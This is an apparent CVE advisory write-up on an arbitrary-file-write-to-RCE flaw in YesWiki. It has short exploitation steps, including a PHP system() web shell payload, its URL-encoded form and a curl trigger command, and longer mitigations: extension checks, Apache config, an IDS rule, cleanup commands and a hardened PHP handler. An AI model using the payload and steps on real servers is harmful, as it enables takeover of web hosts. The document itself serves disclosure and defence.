YesWiki, Arbitrary File Write to RCE, CVE-2023-XXXX (Critical)


How the CVE Works

The vulnerability arises from insufficient validation in YesWiki’s file-upload functionality, allowing attackers to write arbitrary files with a `.php` extension. By intercepting a legitimate CSS template save request via a proxy (e.g., Burp Suite), an attacker can modify the filename to `.php` and inject PHP code into a parameter (e.g., primary-color=<?php system($_GET['cmd']); ?>). The server saves the malicious file to a web-accessible directory (e.g., /var/www/html/custom/css-presets/), enabling remote code execution (RCE) by accessing the file with a `cmd` parameter (e.g., pizzapower.php?cmd=id). This exploit chain combines arbitrary file write with weak server configuration (PHP execution in writable directories).

DailyCVE Form

Platform: YesWiki
Version: Latest
Vulnerability: Arbitrary File Write → RCE
Severity: Critical
Date: 2023-XX-XX

What Undercode Says:

Exploitation:

1. Intercept Request:

burpsuite

Modify `POST /?api/templates/custom-presets/test.css` to `.php`.

2. Inject PHP Payload:

primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E

3. Trigger RCE:

curl http://localhost:8085/custom/css-presets/pizzapower.php?cmd=id

Mitigation:

1. Restrict Extensions:

$allowed_ext = ['css'];
$ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); // compare the actual extension, case-insensitively
if (!in_array($ext, $allowed_ext, true)) { die("Invalid extension"); }

2. Disable PHP in Writable Dirs:

<Directory /var/www/html/custom/css-presets>
php_admin_flag engine off
</Directory>

3. Patch Analysis:

- $filename = $_REQUEST['file'];
+ $filename = basename($_REQUEST['file'], '.css');
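Review bot: `basename($_REQUEST['file'], '.css')` only strips directory components and a trailing `.css`; it does not reject other extensions, so a request for `pizzapower.php` passes through unchanged and the `.php` write described above remains possible. After stripping, validate the remaining name against a strict pattern such as `^[A-Za-z0-9_-]+$` and append `.css` yourself when building the target path.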

4. Log Monitoring:

tail -f /var/log/apache2/access.log | grep -E 'css-presets/[^ ]*\.php'

5. Exploit Detection (IDS Rule):

# The payload arrives URL-encoded in the POST body (see the injection step above), so match the encoded form
alert http any any -> any any (msg:"YesWiki RCE Attempt"; flow:to_server; content:"system%28%24_GET"; http_client_body; nocase; sid:10001; rev:1;)

6. Cleanup Exploited Files:

find /var/www/html/custom/css-presets -type f -name "*.php" -delete

7. Hardening:

chown -R root:www-data /var/www/html/custom/css-presets
chmod 750 /var/www/html/custom/css-presets

8. Test Fixes:

wget -q -O /dev/null http://localhost:8085/custom/css-presets/test.php && echo "Vulnerable"
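The extension restriction in mitigation 1 and the patch in mitigation 3 both stop at the filename, while the write-up above shows the payload entering through a preset value. The following hardened save handler is an added example, not YesWiki's own code: function names, the property whitelist and the preset directory are assumptions, and it rejects both the `.php` filename and the PHP-bearing value from the advisory.

```php
<?php
// Added example (not YesWiki's own code): a hardened save handler for the
// CSS-preset endpoint described above. Function and parameter names are
// hypothetical; the real YesWiki API differs.

// Accept only a bare "name.css" filename: no directory parts, no other extension.
function safePresetFilename(string $requested): ?string
{
    $name = basename($requested);
    if (preg_match('/^[A-Za-z0-9_-]{1,64}\.css$/', $name) !== 1) {
        return null; // "pizzapower.php", "../x.css" and "a.css.php" are all rejected
    }
    return $name;
}

// Accept only values that are plausible CSS colours, so "<?php ... ?>" can never
// be written into the preset file. Extend the property whitelist as needed.
function sanitizePresetValues(array $params): array
{
    $allowedProps = ['primary-color', 'secondary-color', 'background-color'];
    $clean = [];
    foreach ($allowedProps as $prop) {
        if (!isset($params[$prop])) {
            continue;
        }
        $value = trim((string) $params[$prop]);
        if (preg_match('/^(#[0-9A-Fa-f]{3,8}|[a-z]{3,20})$/', $value) === 1) {
            $clean[$prop] = $value;
        }
    }
    return $clean;
}

// Write the preset as ":root { --prop: value; }" inside the preset directory.
function savePreset(string $presetDir, string $requested, array $params): bool
{
    $name = safePresetFilename($requested);
    $values = sanitizePresetValues($params);
    if ($name === null || $values === []) {
        return false;
    }
    $css = ":root {\n";
    foreach ($values as $prop => $value) {
        $css .= "  --{$prop}: {$value};\n";
    }
    $css .= "}\n";
    return file_put_contents($presetDir . DIRECTORY_SEPARATOR . $name, $css, LOCK_EX) !== false;
}

// Constructed request mirroring the attack in the advisory: rejected on both counts.
var_dump(savePreset('/var/www/html/custom/css-presets', 'pizzapower.php',
    ['primary-color' => '<?php system($_GET[\'cmd\']); ?>']));
```

Keep the Apache `engine off` directive from mitigation 2 in place as well, since the handler above only protects this one write path.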

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
